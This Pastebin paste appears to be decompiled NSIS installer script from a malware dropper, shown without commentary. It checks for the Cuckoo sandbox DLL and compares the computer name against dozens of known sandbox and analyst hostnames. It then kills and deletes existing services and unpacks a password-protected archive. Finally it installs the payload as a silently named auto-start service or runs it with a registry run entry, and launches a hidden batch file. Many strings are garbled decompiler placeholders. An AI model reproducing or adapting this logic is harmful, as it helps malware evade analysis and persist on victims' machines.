  911. IntCmp 398 117 913 0 0 0
  912. Goto 921
  913. Call 1400
  914. File š€\System.dll
  915. SetFlag 13 0
  916. Push kernel32::GetModuleHandle(t 'cuckoomon.dll') i.R0
  917. RegisterDLL š€\System.dll Call 0
  918. IntCmp 398 117 920 0 0 0
  919. Goto 921
  920. Goto 923
  921. StrCpy $R0 "TRUE"
  922. Goto 924
  923. StrCpy $R0 "FALSE"
  924. Pop $R1
  925. Return
  926. Push ‹€
  927. Call 1400
  928. File š€\System.dll
  929. SetFlag 13 0
  930. Push kernel32::GetComputerNameA(t.R1, *i1024 R4)i.R2
  931. RegisterDLL š€\System.dll Call 0
  932. Call 1400
  933. File š€\System.dll
  934. SetFlag 13 0
  935. Push User32::CharLower(t R1 R1)i
  936. RegisterDLL š€\System.dll Call 0
  937. Push ‹€
  938. Push xteam-
  939. Call 322
  940. Pop $R0
  941. IntCmp 398 117 943 0 0 0
  942. Goto 1178
  943. Push ‹€
  944. Push vmscan-pc
  945. Call 322
  946. Pop $R0
  947. IntCmp 398 117 949 0 0 0
  948. Goto 1178
  949. Push ‹€
  950. Push brbrb-
  951. Call 322
  952. Pop $R0
  953. IntCmp 398 117 955 0 0 0
  954. Goto 1178
  955. Push ‹€
  956. Push tu-4nh09smcg1hc
  957. Call 322
  958. Pop $R0
  959. IntCmp 398 117 961 0 0 0
  960. Goto 1178
  961. Push ‹€
  962. Push antony-pc
  963. Call 322
  964. Pop $R0
  965. IntCmp 398 117 967 0 0 0
  966. Goto 1178
  967. Push ‹€
  968. Push sandbox
  969. Call 322
  970. Pop $R0
  971. IntCmp 398 117 973 0 0 0
  972. Goto 1178
  973. Push ‹€
  974. Push xp3-host
  975. Call 322
  976. Pop $0
  977. IntCmp 74 117 979 0 0 0
  978. Goto 1178
  979. Push ‹€
  980. Push win-4163c97lwca
  981. Call 322
  982. Pop $R0
  983. IntCmp 398 117 985 0 0 0
  984. Goto 1178
  985. Push ‹€
  986. Push none-dusez58jo1
  987. Call 322
  988. Pop $R0
  989. IntCmp 398 117 991 0 0 0
  990. Goto 1178
  991. Push ‹€
  992. Push ioavm
  993. Call 322
  994. Pop $R0
  995. IntCmp 398 117 997 0 0 0
  996. Goto 1178
  997. Push ‹€
  998. Push placehol-6f699a
  999. Call 322
  1000. Pop $R0
  1001. IntCmp 398 117 1003 0 0 0
  1002. Goto 1178
  1003. Push ‹€
  1004. Push elvis-pc
  1005. Call 322
  1006. Pop $R0
  1007. IntCmp 398 117 1009 0 0 0
  1008. Goto 1178
  1009. Push ‹€
  1010. Push tequilaboomboom
  1011. Call 322
  1012. Pop $R0
  1013. IntCmp 398 117 1015 0 0 0
  1014. Goto 1178
  1015. Push ‹€
  1016. Push maltest
  1017. Call 322
  1018. Pop $R0
  1019. IntCmp 398 117 1021 0 0 0
  1020. Goto 1178
  1021. Push ‹€
  1022. Push ad-europe-
  1023. Call 322
  1024. Pop $R0
  1025. IntCmp 398 117 1027 0 0 0
  1026. Goto 1178
  1027. Push ‹€
  1028. Push windowshost
  1029. Call 322
  1030. Pop $R0
  1031. IntCmp 398 117 1033 0 0 0
  1032. Goto 1178
  1033. Push ‹€
  1034. Push wilbert-
  1035. Call 322
  1036. Pop $R0
  1037. IntCmp 398 117 1039 0 0 0
  1038. Goto 1178
  1039. Push ‹€
  1040. Push cws0
  1041. Call 322
  1042. Pop $R0
  1043. IntCmp 398 117 1045 0 0 0
  1044. Goto 1178
  1045. Push ‹€
  1046. Push cws1
  1047. Call 322
  1048. Pop $R0
  1049. IntCmp 398 117 1051 0 0 0
  1050. Goto 1178
  1051. Push ‹€
  1052. Push template
  1053. Call 322
  1054. Pop $R0
  1055. IntCmp 398 117 1057 0 0 0
  1056. Goto 1178
  1057. Push ‹€
  1058. Push cuckoo
  1059. Call 322
  1060. Pop $R0
  1061. IntCmp 398 117 1063 0 0 0
  1062. Goto 1178
  1063. Push ‹€
  1064. Push virtual
  1065. Call 322
  1066. Pop $R0
  1067. IntCmp 398 117 1069 0 0 0
  1068. Goto 1178
  1069. Push ‹€
  1070. Push rats-pc
  1071. Call 322
  1072. Pop $R0
  1073. IntCmp 398 117 1075 0 0 0
  1074. Goto 1178
  1075. Push ‹€
  1076. Push JOHNNYBRAVO-PC
  1077. Call 322
  1078. Pop $R0
  1079. IntCmp 398 117 1081 0 0 0
  1080. Goto 1178
  1081. Push ‹€
  1082. Push TEST-
  1083. Call 322
  1084. Pop $R0
  1085. IntCmp 398 117 1087 0 0 0
  1086. Goto 1178
  1087. Push ‹€
  1088. Push sandbox-
  1089. Call 322
  1090. Pop $R0
  1091. IntCmp 398 117 1093 0 0 0
  1092. Goto 1178
  1093. Push ‹€
  1094. Push ANTONY-PC
  1095. Call 322
  1096. Pop $R0
  1097. IntCmp 398 117 1099 0 0 0
  1098. Goto 1178
  1099. Push ‹€
  1100. Push CTP79LO-PC
  1101. Call 322
  1102. Pop $R0
  1103. IntCmp 398 117 1105 0 0 0
  1104. Goto 1178
  1105. Push ‹€
  1106. Push GUMRD-PC
  1107. Call 322
  1108. Pop $R0
  1109. IntCmp 398 117 1111 0 0 0
  1110. Goto 1178
  1111. Push ‹€
  1112. Push ITYTS-PC
  1113. Call 322
  1114. Pop $R0
  1115. IntCmp 398 117 1117 0 0 0
  1116. Goto 1178
  1117. Push ‹€
  1118. Push OIYKL-PC
  1119. Call 322
  1120. Pop $R0
  1121. IntCmp 398 117 1123 0 0 0
  1122. Goto 1178
  1123. Push ‹€
  1124. Push VQK4F8-PC
  1125. Call 322
  1126. Pop $R0
  1127. IntCmp 398 117 1129 0 0 0
  1128. Goto 1178
  1129. Push ‹€
  1130. Push WZUKB-PC
  1131. Call 322
  1132. Pop $R0
  1133. IntCmp 398 117 1135 0 0 0
  1134. Goto 1178
  1135. Push ‹€
  1136. Push Y2YGZSHVNDTS-PC
  1137. Call 322
  1138. Pop $R0
  1139. IntCmp 398 117 1141 0 0 0
  1140. Goto 1178
  1141. Push ‹€
  1142. Push LUSER-PC
  1143. Call 322
  1144. Pop $R0
  1145. IntCmp 398 117 1147 0 0 0
  1146. Goto 1178
  1147. Push ‹€
  1148. Push ABBY-PC
  1149. Call 322
  1150. Pop $R0
  1151. IntCmp 398 117 1153 0 0 0
  1152. Goto 1178
  1153. Push ‹€
  1154. Push ADMINIS
  1155. Call 322
  1156. Pop $R0
  1157. IntCmp 398 117 1159 0 0 0
  1158. Goto 1178
  1159. Push ‹€
  1160. Push RATS
  1161. Call 322
  1162. Pop $R0
  1163. IntCmp 398 117 1165 0 0 0
  1164. Goto 1178
  1165. Push ‹€
  1166. Push PUBLIC-
  1167. Call 322
  1168. Pop $R0
  1169. IntCmp 398 117 1171 0 0 0
  1170. Goto 1178
  1171. Push ‹€
  1172. Push ABC-
  1173. Call 322
  1174. Pop $R0
  1175. IntCmp 398 117 1177 0 0 0
  1176. Goto 1178
  1177. Goto 1180
  1178. StrCpy $R0 "TRUE"
  1179. Goto 1181
  1180. StrCpy $R0 "FALSE"
  1181. Pop $R1
  1182. Return
  1183. Call 406
  1184. StrCmp  "Š€" "TRUE" 0 1186 0
  1185. Goto 1211
  1186. Call 343
  1187. StrCmp  "Š€" "TRUE" 0 1189 0
  1188. Goto 1211
  1189. Call 641
  1190. StrCmp  "Š€" "TRUE" 0 1192 0
  1191. Goto 1211
  1192. Call 730
  1193. StrCmp  "Š€" "TRUE" 0 1195 0
  1194. Goto 1211
  1195. Call 849
  1196. StrCmp  "Š€" "TRUE" 0 1198 0
  1197. Goto 1211
  1198. Call 371
  1199. StrCmp  "Š€" "TRUE" 0 1201 0
  1200. Goto 1211
  1201. Call 441
  1202. StrCmp  "Š€" "TRUE" 0 1204 0
  1203. Goto 1211
  1204. Call 540
  1205. StrCmp  "Š€" "TRUE" 0 1207 0
  1206. Goto 1211
  1207. Call 926
  1208. StrCmp  "Š€" "TRUE" 0 1210 0
  1209. Goto 1211
  1210. Goto 1213
  1211. StrCpy $R0 "TRUE"
  1212. Goto 1214
  1213. StrCpy $R0 "FALSE"
  1214. Return
  1215. SetOutPath ™€
  1216. SetFlag 2 117
  1217. Call 1183
  1218. StrCmp  "Š€" "TRUE" 0 1220 0
  1219. Goto 1306
  1220. SetOutPath ™€
  1221. SetFlag 2 117
  1222. ReadRegStr 16 2147483649 4245 4259 0
  1223. ReadRegStr 17 2147483649 4245 4267 0
  1224. ReadRegStr 18 2147483649 4245 4271 0
  1225. ReadRegStr 19 2147483649 4245 4278 0
  1226. Call 1400
  1227. File š€\nsExec.dll
  1228. SetFlag 13 0
  1229. Push cmd /c net stop € /y
  1230. RegisterDLL š€\nsExec.dll Exec 0
  1231. Call 1400
  1232. File š€\nsExec.dll
  1233. SetFlag 13 0
  1234. Push cmd /c sc delete €
  1235. RegisterDLL š€\nsExec.dll Exec 0
  1236. Call 1400
  1237. File š€\nsExec.dll
  1238. SetFlag 13 0
  1239. Push cmd /c taskkill /f /im "“€"
  1240. RegisterDLL š€\nsExec.dll Exec 0
  1241. DelReg 0 2147483649 4379 4425
  1242. Delete ’€\“€
  1243. Call 1400
  1244. File š€\UserInfo.dll
  1245. SetFlag 13 0
  1246. RegisterDLL š€\UserInfo.dll GetAccountType 0
  1247. Pop $R5
  1248. StrCmp  "€" "Admin" 1249 1283 0
  1249. WriteReg 2147483649 4245 4259 4479 1
  1250. WriteReg 2147483649 4245 4267 4488 1
  1251. WriteReg 2147483649 4245 4271 4497 1
  1252. WriteReg 2147483649 4245 4278 4519 1
  1253. ReadRegStr 16 2147483649 4245 4259 0
  1254. ReadRegStr 17 2147483649 4245 4267 0
  1255. ReadRegStr 18 2147483649 4245 4271 0
  1256. ReadRegStr 19 2147483649 4245 4278 0
  1257. SetOutPath š€
  1258. File 7za.exe
  1259. File archive.7z
  1260. Call 1400
  1261. File š€\nsExec.dll
  1262. SetFlag 13 0
  1263. Push 7za.exe x archive.7z -pX9e5UD6AN1vQCK08DM4O -o"’€" -aoa
  1264. RegisterDLL š€\nsExec.dll Exec 0
  1265. Rename ’€\archive.cab ’€\“€ 0
  1266. IfFileExists ’€\“€ 0 1306
  1267. Call 1400
  1268. File š€\nsExec.dll
  1269. SetFlag 13 0
  1270. Push sc create € binpath= "’€\“€ -service" type= own start= auto displayname= ""
  1271. RegisterDLL š€\nsExec.dll Exec 0
  1272. Call 1400
  1273. File š€\nsExec.dll
  1274. SetFlag 13 0
  1275. Push sc description € ""
  1276. RegisterDLL š€\nsExec.dll Exec 0
  1277. Call 1400
  1278. File š€\nsExec.dll
  1279. SetFlag 13 0
  1280. Push net start € /y
  1281. RegisterDLL š€\nsExec.dll Exec 0
  1282. Goto 1306
  1283. WriteReg 2147483649 4245 4259 4479 1
  1284. WriteReg 2147483649 4245 4267 4488 1
  1285. WriteReg 2147483649 4245 4271 4497 1
  1286. WriteReg 2147483649 4245 4278 4519 1
  1287. ReadRegStr 16 2147483649 4245 4259 0
  1288. ReadRegStr 17 2147483649 4245 4267 0
  1289. ReadRegStr 18 2147483649 4245 4271 0
  1290. ReadRegStr 19 2147483649 4245 4278 0
  1291. SetOutPath š€
  1292. File 7za.exe
  1293. File archive.7z
  1294. Call 1400
  1295. File š€\nsExec.dll
  1296. SetFlag 13 0
  1297. Push 7za.exe x archive.7z -pX9e5UD6AN1vQCK08DM4O -o"’€" -aoa
  1298. RegisterDLL š€\nsExec.dll Exec 0
  1299. IfFileExists ’€\“€ 0 1306
  1300. WriteReg 2147483649 4379 4425 4429 1
  1301. Call 1400
  1302. File š€\nsExec.dll
  1303. SetFlag 13 0
  1304. Push cmd /c start "" "’€\“€"
  1305. RegisterDLL š€\nsExec.dll Exec 0
  1306. Return
  1307. Call 1400
  1308. File š€\System.dll
  1309. SetFlag 13 0
  1310. Push kernel32::CreateMutexA(i 0, i 0, t "‚€") i .r1 ?e
  1311. RegisterDLL š€\System.dll Call 0
  1312. Pop $R0
  1313. StrCmp  "Š€" "0" 1315 0 0
  1314. Abort
  1315. Return
  1316. StrCpy $R3 "›€"
  1317. Call 1400
  1318. File š€\System.dll
  1319. SetFlag 13 0
  1320. Push kernel32::GetShortPathName(t R3, t.R3,i 1024)
  1321. RegisterDLL š€\System.dll Call 0
  1322. Call 1400
  1323. File š€\System.dll
  1324. SetFlag 13 0
  1325. Push kernel32::GetTempPathA(i 1024, t .R0) i .r2
  1326. RegisterDLL š€\System.dll Call 0
  1327. Call 1400
  1328. File š€\System.dll
  1329. SetFlag 13 0
  1330. Push kernel32::GetShortPathName(t R0, t.R0,i 1024)
  1331. RegisterDLL š€\System.dll Call 0
  1332. StrCpy $R0 "Š€1.bat"
  1333. FileOpen 11 1073741824 2 398
  1334. FileWrite 11 4994 0
  1335. FileWrite 11 5001 0
  1336. FileWrite 11 5028 0
  1337. FileWrite 11 5038 0
  1338. FileWrite 11 5062 0
  1339. FileClose 11
  1340. Push Š€
  1341. Call 1343
  1342. Goto 1398
  1343. Call 1400
  1344. File š€\System.dll
  1345. SetFlag 13 0
  1346. Push S
  1347. RegisterDLL š€\System.dll Store 0
  1348. Push error
  1349. Call 1400
  1350. File š€\System.dll
  1351. SetFlag 13 0
  1352. Push 72
  1353. RegisterDLL š€\System.dll Alloc 0
  1354. Pop $2
  1355. Call 1400
  1356. File š€\System.dll
  1357. SetFlag 13 0
  1358. Push *‚€(i72)
  1359. RegisterDLL š€\System.dll Call 0
  1360. Call 1400
  1361. File š€\System.dll
  1362. SetFlag 13 0
  1363. Push *(i,i,i,i)i.r3
  1364. RegisterDLL š€\System.dll Call 0
  1365. Exch
  1366. Call 1400
  1367. File š€\System.dll
  1368. SetFlag 13 0
  1369. Push kernel32::CreateProcess(i0, ts, i0, i0, i0, i0x8000000, i0, i0, ir2, ir3)i.r4
  1370. RegisterDLL š€\System.dll Call 0
  1371. Pop $6
  1372. Call 1400
  1373. File š€\System.dll
  1374. SetFlag 13 0
  1375. Push kernel32::GetExitCodeProcess(ir4, *i.s)
  1376. RegisterDLL š€\System.dll Call 0
  1377. Call 1400
  1378. File š€\System.dll
  1379. SetFlag 13 0
  1380. Push kernel32::CloseHandle(ir4)
  1381. RegisterDLL š€\System.dll Call 0
  1382. Call 1400
  1383. File š€\System.dll
  1384. SetFlag 13 0
  1385. Push ‚€
  1386. RegisterDLL š€\System.dll Free 0
  1387. Call 1400
  1388. File š€\System.dll
  1389. SetFlag 13 0
  1390. Push ƒ€
  1391. RegisterDLL š€\System.dll Free 0
  1392. Call 1400
  1393. File š€\System.dll
  1394. SetFlag 13 0
  1395. Push L
  1396. RegisterDLL š€\System.dll Store 0
  1397. Return
  1398. Pop $0
  1399. Return
  1400. SetFlag 13 115
  1401. StrCmp  "š€" "" 0 1410 0
  1402. Push €€
  1403. SetFlag 2 0
  1404. GetTempFileName  ™€
  1405. Delete 8 €€
  1406. SetOutPath €€
  1407. IfFlag 1411 0 2 0
  1408. StrCpy $PLUGINSDIR "€€"
  1409. Pop $0
  1410. Return
  1411. MessageBox 2097168 5257 0 0 0
  1412. Quit
  1413. Return
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!